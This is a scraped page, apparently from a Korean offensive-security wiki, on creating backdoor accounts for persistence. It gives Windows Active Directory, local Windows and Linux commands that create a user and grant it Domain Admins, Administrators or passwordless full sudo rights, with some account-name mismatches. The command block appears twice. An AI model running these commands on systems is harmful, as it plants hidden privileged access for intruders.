Create Account

지속성을 위한 방법론 중 가장 기초적이며 간단한 것은 계정 생성입니다. 공격자는 자신이 생성한 계정을 관리자 혹은 루트의 권한을 등록함으로써 언제든 시스템에 접속할 수 있습니다.

# 계정 생성
New-ADUser -Name "wiki2" -SamAccountName "wiki2" -AccountPassword (ConvertTo-SecureString "password123!" -AsPlainText -Force) -Enabled $true

# 도메인 관리자에 등록
Add-ADGroupMember -Identity "Domain Admins" -Members "wiki"

# 계정 생성
net user wiki password123! /add

# Administrators 그룹에 추가
net localgroup Administrators wiki /add

# 계정 생성 및 패스워드 설정
useradd wiki
passwd wiki
password123!
password123!

# 모든 sudo 권한 부여
echo "wiki ALL=(root) NOPASSWD: ALL" >> /etc/sudoers'

PreviousDLL SideLoading NextActive Directory

Last updated 1 month ago

Was this helpful?

Create Account

# 계정 생성
New-ADUser -Name "wiki2" -SamAccountName "wiki2" -AccountPassword (ConvertTo-SecureString "password123!" -AsPlainText -Force) -Enabled $true

# 도메인 관리자에 등록
Add-ADGroupMember -Identity "Domain Admins" -Members "wiki"

# 계정 생성
net user wiki password123! /add

# Administrators 그룹에 추가
net localgroup Administrators wiki /add

# 계정 생성 및 패스워드 설정
useradd wiki
passwd wiki
password123!
password123!

# 모든 sudo 권한 부여
echo "wiki ALL=(root) NOPASSWD: ALL" >> /etc/sudoers'

PreviousDLL SideLoading NextActive Directory

Last updated 1 month ago

Was this helpful?